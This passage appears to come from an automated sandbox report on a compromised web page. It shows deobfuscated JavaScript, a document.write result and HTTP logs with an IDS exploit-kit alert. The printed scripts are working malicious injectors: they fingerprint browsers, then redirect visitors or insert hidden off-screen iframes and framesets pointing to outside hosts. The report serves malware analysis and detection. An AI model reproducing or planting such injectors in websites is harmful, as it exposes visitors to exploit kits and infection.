                        cbHRxdMBejiosgNbnFdqqbvhXYruVQdLnknKJvAx[hKiCbVqFkFocjwkxpBxrMNgzpsBaEXjsDEAoUO].innerHTML = cbHRxdMBejiosgNbnFdqqbvhXYruVQdLnknKJvAx[hKiCbVqFkFocjwkxpBxrMNgzpsBaEXjsDEAoUO].innerHTML + YIVbAkWhXjHsgpJLJtwKbqbxslneeEVXc
                    }
                }
            }
        }
        xHadRuQQaeuHOyErqeupJnLpirvnoDVsgkDo()
    }
}, 100);

function xHadRuQQaeuHOyErqeupJnLpirvnoDVsgkDo() {
    var OqruwoxlZbJmzcvZIUVdCcOXPNYtqLcazWmoXGwW = "none";
    if (OqruwoxlZbJmzcvZIUVdCcOXPNYtqLcazWmoXGwW != "none") {
        var wDExITQZpYPgfkXTiNoPkXIhOXIszlh = document.getElementById(OqruwoxlZbJmzcvZIUVdCcOXPNYtqLcazWmoXGwW);
        if (typeof wDExITQZpYPgfkXTiNoPkXIhOXIszlh != undefined && wDExITQZpYPgfkXTiNoPkXIhOXIszlh != null) {
            wDExITQZpYPgfkXTiNoPkXIhOXIszlh.outerHTML = "";
            delete wDExITQZpYPgfkXTiNoPkXIhOXIszlh
        }
    }
};

function fIWfEqmxuupijIgAVKULyCvosSNYtYTXj() {
    if (document.all && !document.compatMode) {
        return true
    } else if (document.all && !window.XMLHttpRequest) {
        return true
    } else if (document.all && !document.querySelector) {
        return true
    } else if (document.all && !document.addEventListener) {
        return true
    } else if (document.all && !window.atob) {
        return true
    } else if (document.all) {
        return true
    } else if (typeof navigator.maxTouchPoints != "undefined" && !document.all && LSprLIsCGdqhuIRYyzJXlAipUaDyuEHnAZXPmb()) {
        return true
    } else {
        return false
    }
}

function LSprLIsCGdqhuIRYyzJXlAipUaDyuEHnAZXPmb() {
    var SKLveWJUdmuOveUotQDejDLhAYYtJlkRsAXyKfOn = window.navigator.userAgent;
    var owckESfZohqaqafGEXZEEBWvzjEmizFdkLaUO = SKLveWJUdmuOveUotQDejDLhAYYtJlkRsAXyKfOn.indexOf("MSIE ");
    if (owckESfZohqaqafGEXZEEBWvzjEmizFdkLaUO > 0) {
        return parseInt(SKLveWJUdmuOveUotQDejDLhAYYtJlkRsAXyKfOn.substring(owckESfZohqaqafGEXZEEBWvzjEmizFdkLaUO + 5, SKLveWJUdmuOveUotQDejDLhAYYtJlkRsAXyKfOn.indexOf(".", owckESfZohqaqafGEXZEEBWvzjEmizFdkLaUO)), 10)
    }
    var fxKxgyPEPmfGQyQCPnlbSAFebppKBHITLuSyzxYgm = SKLveWJUdmuOveUotQDejDLhAYYtJlkRsAXyKfOn.indexOf("Trident/");
    if (fxKxgyPEPmfGQyQCPnlbSAFebppKBHITLuSyzxYgm > 0) {
        var echCwIsOasOKxccOZevMXJUnUTVRUdtVcp = SKLveWJUdmuOveUotQDejDLhAYYtJlkRsAXyKfOn.indexOf("rv:");
        return parseInt(SKLveWJUdmuOveUotQDejDLhAYYtJlkRsAXyKfOn.substring(echCwIsOasOKxccOZevMXJUnUTVRUdtVcp + 3, SKLveWJUdmuOveUotQDejDLhAYYtJlkRsAXyKfOn.indexOf(".", echCwIsOasOKxccOZevMXJUnUTVRUdtVcp)), 10)
    }
    var HdvzdKwWpaFuzNVsriUfppIrZYeJCjxfz = SKLveWJUdmuOveUotQDejDLhAYYtJlkRsAXyKfOn.indexOf("Edge/");
    if (HdvzdKwWpaFuzNVsriUfppIrZYeJCjxfz > 0) {
        return parseInt(SKLveWJUdmuOveUotQDejDLhAYYtJlkRsAXyKfOn.substring(HdvzdKwWpaFuzNVsriUfppIrZYeJCjxfz + 5, SKLveWJUdmuOveUotQDejDLhAYYtJlkRsAXyKfOn.indexOf(".", HdvzdKwWpaFuzNVsriUfppIrZYeJCjxfz)), 10)
    }
    return false
}

function LvULxPxBVGMNEHpyOpFcGdQwYTNwIJsV() {
    var PKxNNdgCJRDRgxZEWaQkmvAmVIZFVsP = window.navigator.userAgent.toLowerCase();
    if (/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(PKxNNdgCJRDRgxZEWaQkmvAmVIZFVsP) || /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(PKxNNdgCJRDRgxZEWaQkmvAmVIZFVsP.substr(0, 4))) {
        return true
    }
    return false
}
                                    

#7 JavaScript::Eval (size: 6247, repeated: 1) - SHA256: 661bc9a33bd1fb4d7c0cc2f0ddcdaea68911a5e3a0080599becac7bf631f845f

var elLiWDCYRRWCkIjpgVDhhBXoQhGcDERtdXfHNyK = setInterval(function() {
    if (document.body != null && typeof document.body != "undefined") {
        clearInterval(elLiWDCYRRWCkIjpgVDhhBXoQhGcDERtdXfHNyK);
        if (typeof window["v_33c6707314d42037774f224bfc240de3"] == "undefined") {
            window["v_33c6707314d42037774f224bfc240de3"] = 1;
            var aFWtDvEFIEInuLoLDzJnCeGAKKbmxpEWQDXN = (sqIDAdAwkhGJJkcYWCPvOoAfKkTlxlbWeBlC() && prdRoEfNrGDbCcIMVbhsmaQsiZvIjkCJ());
            var PwCVTiftpOaGEJHBvJvYKBywNSfFxgbMsWUR = !aFWtDvEFIEInuLoLDzJnCeGAKKbmxpEWQDXN && !!window.chrome && window.navigator.vendor === "Google Inc.";
            var rxLuhcCtSKoSuiZlgWmTNzDxwhutepjnTHScq = -1;
            var RHbmKaWeFTCOjgdekVHHEWrBCWAYghChPUd = "http://trahnytbushakiry.ga";
            if (xOMySnhCwZEzHGrXwDnFapmIhVsYDwPd() && rxLuhcCtSKoSuiZlgWmTNzDxwhutepjnTHScq == 1) {
                if ((navigator.userAgent.match(/iPhone/i)) || (navigator.userAgent.match(/iPod/i))) {
                    location.replace(RHbmKaWeFTCOjgdekVHHEWrBCWAYghChPUd)
                } else {
                    window.location = RHbmKaWeFTCOjgdekVHHEWrBCWAYghChPUd;
                    document.location = RHbmKaWeFTCOjgdekVHHEWrBCWAYghChPUd
                }
            } else {
                if ((aFWtDvEFIEInuLoLDzJnCeGAKKbmxpEWQDXN && !PwCVTiftpOaGEJHBvJvYKBywNSfFxgbMsWUR && !xOMySnhCwZEzHGrXwDnFapmIhVsYDwPd())) {
                    var GGqaDVLblSjzYvDOmYnijjaNjDyxxwhvPcbzhS = "<div style=\"position:absolute;left:-2566px;\"><iframe width=\"19px\" src=\"" + RHbmKaWeFTCOjgdekVHHEWrBCWAYghChPUd + "\" height=\"19px\"></iframe></div>";
                    var GTHIeQzYLyWfwXbKgaFXwCHRMmNMnSUCgL = document.getElementsByTagName("div");
                    if (GTHIeQzYLyWfwXbKgaFXwCHRMmNMnSUCgL.length == 0) {
                        document.body.innerHTML = document.body.innerHTML + GGqaDVLblSjzYvDOmYnijjaNjDyxxwhvPcbzhS
                    } else {
                        var dl_name = GTHIeQzYLyWfwXbKgaFXwCHRMmNMnSUCgL.length;
                        var QDukCqzbFQQgMOmKgEcTneBfOXNbvXFLza = Math.floor((dl_name / 2));
                        GTHIeQzYLyWfwXbKgaFXwCHRMmNMnSUCgL[QDukCqzbFQQgMOmKgEcTneBfOXNbvXFLza].innerHTML = GTHIeQzYLyWfwXbKgaFXwCHRMmNMnSUCgL[QDukCqzbFQQgMOmKgEcTneBfOXNbvXFLza].innerHTML + GGqaDVLblSjzYvDOmYnijjaNjDyxxwhvPcbzhS
                    }
                }
            }
        }
        jOYRAGqvhMRWrYlHjHxNpKABEgySjQFOCPOqIO()
    }
}, 100);

function jOYRAGqvhMRWrYlHjHxNpKABEgySjQFOCPOqIO() {
    var qFDYKZbIajGeZiFlGEdQCMHZbreCNkof = "none";
    if (qFDYKZbIajGeZiFlGEdQCMHZbreCNkof != "none") {
        var ImUmydOrVKRPWjJkzpObJleKWAEZKtC = document.getElementById(qFDYKZbIajGeZiFlGEdQCMHZbreCNkof);
        if (typeof ImUmydOrVKRPWjJkzpObJleKWAEZKtC != undefined && ImUmydOrVKRPWjJkzpObJleKWAEZKtC != null) {
            ImUmydOrVKRPWjJkzpObJleKWAEZKtC.outerHTML = "";
            delete ImUmydOrVKRPWjJkzpObJleKWAEZKtC
        }
    }
};

function prdRoEfNrGDbCcIMVbhsmaQsiZvIjkCJ() {
    if (document.all && !document.compatMode) {
        return true
    } else if (document.all && !window.XMLHttpRequest) {
        return true
    } else if (document.all && !document.querySelector) {
        return true
    } else if (document.all && !document.addEventListener) {
        return true
    } else if (document.all && !window.atob) {
        return true
    } else if (document.all) {
        return true
    } else if (typeof navigator.maxTouchPoints != "undefined" && !document.all && sqIDAdAwkhGJJkcYWCPvOoAfKkTlxlbWeBlC()) {
        return true
    } else {
        return false
    }
}

function sqIDAdAwkhGJJkcYWCPvOoAfKkTlxlbWeBlC() {
    var lLEiCNopvZAYcpmjjEdWutFXzCfblzRffiOqQj = window.navigator.userAgent;
    var EAAnOTWmZdBVIJrDadjztNXNuQGNESyRXdhJ = lLEiCNopvZAYcpmjjEdWutFXzCfblzRffiOqQj.indexOf("MSIE ");
    if (EAAnOTWmZdBVIJrDadjztNXNuQGNESyRXdhJ > 0) {
        return parseInt(lLEiCNopvZAYcpmjjEdWutFXzCfblzRffiOqQj.substring(EAAnOTWmZdBVIJrDadjztNXNuQGNESyRXdhJ + 5, lLEiCNopvZAYcpmjjEdWutFXzCfblzRffiOqQj.indexOf(".", EAAnOTWmZdBVIJrDadjztNXNuQGNESyRXdhJ)), 10)
    }
    var WPnJtCfgHjWpyzwcafHUftdLsUcQmsAxAKYRPnCx = lLEiCNopvZAYcpmjjEdWutFXzCfblzRffiOqQj.indexOf("Trident/");
    if (WPnJtCfgHjWpyzwcafHUftdLsUcQmsAxAKYRPnCx > 0) {
        var grBHPptZdaWCkexahntNOtjUSErwhMeIFWarVG = lLEiCNopvZAYcpmjjEdWutFXzCfblzRffiOqQj.indexOf("rv:");
        return parseInt(lLEiCNopvZAYcpmjjEdWutFXzCfblzRffiOqQj.substring(grBHPptZdaWCkexahntNOtjUSErwhMeIFWarVG + 3, lLEiCNopvZAYcpmjjEdWutFXzCfblzRffiOqQj.indexOf(".", grBHPptZdaWCkexahntNOtjUSErwhMeIFWarVG)), 10)
    }
    var GwnizXWPuQKhDQsPNOQFxtSqcOdzFaNvFtQfNMW = lLEiCNopvZAYcpmjjEdWutFXzCfblzRffiOqQj.indexOf("Edge/");
    if (GwnizXWPuQKhDQsPNOQFxtSqcOdzFaNvFtQfNMW > 0) {
        return parseInt(lLEiCNopvZAYcpmjjEdWutFXzCfblzRffiOqQj.substring(GwnizXWPuQKhDQsPNOQFxtSqcOdzFaNvFtQfNMW + 5, lLEiCNopvZAYcpmjjEdWutFXzCfblzRffiOqQj.indexOf(".", GwnizXWPuQKhDQsPNOQFxtSqcOdzFaNvFtQfNMW)), 10)
    }
    return false
}

function xOMySnhCwZEzHGrXwDnFapmIhVsYDwPd() {
    var JtybplloeNxwQpzClpOORxjWvsvwOFGRu = window.navigator.userAgent.toLowerCase();
    if (/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(JtybplloeNxwQpzClpOORxjWvsvwOFGRu) || /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(JtybplloeNxwQpzClpOORxjWvsvwOFGRu.substr(0, 4))) {
        return true
    }
    return false
}
                                    

#8 JavaScript::Eval (size: 6315, repeated: 1) - SHA256: c3bc3fab850d3318a928eb4794e717f328596de263e2f2cc7e6cc9c253e907e5

var mgHhQYahdFelqeqOwnGpKYteGNnCIUjYOFzAcROel = setInterval(function() {
    if (document.body != null && typeof document.body != "undefined") {
        clearInterval(mgHhQYahdFelqeqOwnGpKYteGNnCIUjYOFzAcROel);
        if (typeof window["v_33c6707314d42037774f224bfc240de3"] == "undefined") {
            window["v_33c6707314d42037774f224bfc240de3"] = 1;
            var sgkzBydgeJesFKtuFylpmYJMWyppNirwnlEIVBfvf = (qLdydXehYIEMyPdfTmkyxuegkfKrrqYeHQadN() && GoOivhIfOYylwWesOJnLktMdrCXPWifLHpxGWFRo());
            var rLbpfSEJofuwDgSBbyPADedtpWJHZnKMdHYBrWr = !sgkzBydgeJesFKtuFylpmYJMWyppNirwnlEIVBfvf && !!window.chrome && window.navigator.vendor === "Google Inc.";
            var EWpysYcYJIgXPmCefUkiCRChuxsCrKYPRr = -1;
            var wEogEvFVVzkuZsmEzuLSMJBGLhhtXBNknRwjMZ = "http://trahnytbushakiry.ga";
            if (CinwPHDgadHBjYdkxRmrSwryNfmTQjfDLt() && EWpysYcYJIgXPmCefUkiCRChuxsCrKYPRr == 1) {
                if ((navigator.userAgent.match(/iPhone/i)) || (navigator.userAgent.match(/iPod/i))) {
                    location.replace(wEogEvFVVzkuZsmEzuLSMJBGLhhtXBNknRwjMZ)
                } else {
                    window.location = wEogEvFVVzkuZsmEzuLSMJBGLhhtXBNknRwjMZ;
                    document.location = wEogEvFVVzkuZsmEzuLSMJBGLhhtXBNknRwjMZ
                }
            } else {
                if ((sgkzBydgeJesFKtuFylpmYJMWyppNirwnlEIVBfvf && !rLbpfSEJofuwDgSBbyPADedtpWJHZnKMdHYBrWr && !CinwPHDgadHBjYdkxRmrSwryNfmTQjfDLt())) {
                    var GYeUByPlQzaCQOkguIbWYQiKWLDqUHbA = "<div style=\"position:absolute;left:-1945px;\"><iframe width=\"22px\" src=\"" + wEogEvFVVzkuZsmEzuLSMJBGLhhtXBNknRwjMZ + "\" height=\"22px\"></iframe></div>";
                    var ybqbeYijNycFmXjrnRVluktfzPEIVNkpibTLUGJm = document.getElementsByTagName("div");
                    if (ybqbeYijNycFmXjrnRVluktfzPEIVNkpibTLUGJm.length == 0) {
                        document.body.innerHTML = document.body.innerHTML + GYeUByPlQzaCQOkguIbWYQiKWLDqUHbA
                    } else {
                        var dl_name = ybqbeYijNycFmXjrnRVluktfzPEIVNkpibTLUGJm.length;
                        var fNspoafbhGysFpGLEsBFxZizblLPrJjjiAmrao = Math.floor((dl_name / 2));
                        ybqbeYijNycFmXjrnRVluktfzPEIVNkpibTLUGJm[fNspoafbhGysFpGLEsBFxZizblLPrJjjiAmrao].innerHTML = ybqbeYijNycFmXjrnRVluktfzPEIVNkpibTLUGJm[fNspoafbhGysFpGLEsBFxZizblLPrJjjiAmrao].innerHTML + GYeUByPlQzaCQOkguIbWYQiKWLDqUHbA
                    }
                }
            }
        }
        zHsmGupjMOGUpggHxSHnVWLnmJFUSTqb()
    }
}, 100);

function zHsmGupjMOGUpggHxSHnVWLnmJFUSTqb() {
    var eejMQMimaScIDPHZMMIDRUrViXmUrmBHqxcAp = "none";
    if (eejMQMimaScIDPHZMMIDRUrViXmUrmBHqxcAp != "none") {
        var tzfrYKAbbCuBcsdfoZEdmVujsjPoiHUx = document.getElementById(eejMQMimaScIDPHZMMIDRUrViXmUrmBHqxcAp);
        if (typeof tzfrYKAbbCuBcsdfoZEdmVujsjPoiHUx != undefined && tzfrYKAbbCuBcsdfoZEdmVujsjPoiHUx != null) {
            tzfrYKAbbCuBcsdfoZEdmVujsjPoiHUx.outerHTML = "";
            delete tzfrYKAbbCuBcsdfoZEdmVujsjPoiHUx
        }
    }
};

function GoOivhIfOYylwWesOJnLktMdrCXPWifLHpxGWFRo() {
    if (document.all && !document.compatMode) {
        return true
    } else if (document.all && !window.XMLHttpRequest) {
        return true
    } else if (document.all && !document.querySelector) {
        return true
    } else if (document.all && !document.addEventListener) {
        return true
    } else if (document.all && !window.atob) {
        return true
    } else if (document.all) {
        return true
    } else if (typeof navigator.maxTouchPoints != "undefined" && !document.all && qLdydXehYIEMyPdfTmkyxuegkfKrrqYeHQadN()) {
        return true
    } else {
        return false
    }
}

function qLdydXehYIEMyPdfTmkyxuegkfKrrqYeHQadN() {
    var yKwzGNoqPIcuAVFRjXKqGyrFzHeHpfUVtDpfI = window.navigator.userAgent;
    var nSTINTbUVzgkZKwGpQvSXWusuuQaZzxfu = yKwzGNoqPIcuAVFRjXKqGyrFzHeHpfUVtDpfI.indexOf("MSIE ");
    if (nSTINTbUVzgkZKwGpQvSXWusuuQaZzxfu > 0) {
        return parseInt(yKwzGNoqPIcuAVFRjXKqGyrFzHeHpfUVtDpfI.substring(nSTINTbUVzgkZKwGpQvSXWusuuQaZzxfu + 5, yKwzGNoqPIcuAVFRjXKqGyrFzHeHpfUVtDpfI.indexOf(".", nSTINTbUVzgkZKwGpQvSXWusuuQaZzxfu)), 10)
    }
    var NEAnxxxQmSwdEAOFUyRrdwQkBvrlTIPZJEcjkDrG = yKwzGNoqPIcuAVFRjXKqGyrFzHeHpfUVtDpfI.indexOf("Trident/");
    if (NEAnxxxQmSwdEAOFUyRrdwQkBvrlTIPZJEcjkDrG > 0) {
        var rHZUuaEXnkuVyGdSHHlRgvkFHaTVtnQWeXhAZLnz = yKwzGNoqPIcuAVFRjXKqGyrFzHeHpfUVtDpfI.indexOf("rv:");
        return parseInt(yKwzGNoqPIcuAVFRjXKqGyrFzHeHpfUVtDpfI.substring(rHZUuaEXnkuVyGdSHHlRgvkFHaTVtnQWeXhAZLnz + 3, yKwzGNoqPIcuAVFRjXKqGyrFzHeHpfUVtDpfI.indexOf(".", rHZUuaEXnkuVyGdSHHlRgvkFHaTVtnQWeXhAZLnz)), 10)
    }
    var sEElnXiBfCobddiwyHEVyLthSQaKSUVUAPGMfNP = yKwzGNoqPIcuAVFRjXKqGyrFzHeHpfUVtDpfI.indexOf("Edge/");
    if (sEElnXiBfCobddiwyHEVyLthSQaKSUVUAPGMfNP > 0) {
        return parseInt(yKwzGNoqPIcuAVFRjXKqGyrFzHeHpfUVtDpfI.substring(sEElnXiBfCobddiwyHEVyLthSQaKSUVUAPGMfNP + 5, yKwzGNoqPIcuAVFRjXKqGyrFzHeHpfUVtDpfI.indexOf(".", sEElnXiBfCobddiwyHEVyLthSQaKSUVUAPGMfNP)), 10)
    }
    return false
}

function CinwPHDgadHBjYdkxRmrSwryNfmTQjfDLt() {
    var YovozoGrLqLkJcIUouCkAcZOBvQeJYA = window.navigator.userAgent.toLowerCase();
    if (/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(YovozoGrLqLkJcIUouCkAcZOBvQeJYA) || /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(YovozoGrLqLkJcIUouCkAcZOBvQeJYA.substr(0, 4))) {
        return true
    }
    return false
}
                                    

Executed Writes (1)

#1 JavaScript::Write (size: 195, repeated: 1) - SHA256: 50a1c440ed7af6c67ed4c47843fad0e3bef22eab8f1b273d5d4f2cb88c6018d2

<frameset rows="*,0" framespacing="0" border="0" frameborder="NO"><frame src="http://grenosi.ru/3d33?charset=utf-8&keyword=honeysuckle hill pumpkin patch" noresize="" scrolling="auto"></frameset>
                                    


HTTP Transactions (52)


Request Response
                                        
                                            GET /homim/zekifohe.html HTTP/1.1 
Host: academicounsel.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

                                         
                                         132.148.50.1
HTTP/1.1 200 OK
Content-Type: text/html
                                        
Date: Thu, 31 May 2018 16:17:52 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 8911
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   8911
Md5:    dae4e540a53b057a9f06d17607cf44c0
Sha1:   d651b3c0d1f54f1e3fe4e448f59da8421b24ddb1
Sha256: 159921e77cf7292196a4cf93f836b564bf1bb865fe1b8eb56026fcb4caa91dec

Alerts:
  IDS:
    - ET CURRENT_EVENTS Possible Evil Redirector Leading to EK June 10 2015
                                        
                                            GET /font-awesome/3.2.1/css/font-awesome.css?ver=3.2.1 HTTP/1.1 
Host: netdna.bootstrapcdn.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://academicounsel.com/homim/zekifohe.html

                                         
                                         209.197.3.15
HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
                                        
Date: Thu, 31 May 2018 16:17:52 GMT
Connection: Keep-Alive
Accept-Ranges: bytes
Etag: "1518903977"
Cache-Control: max-age=31536000
Content-Encoding: gzip
Content-Length: 5376
Last-Modified: Sat, 17 Feb 2018 21:46:17 GMT
X-Hello-Human: Say hello back! @getBootstrapCDN on Twitter
Access-Control-Allow-Origin: *
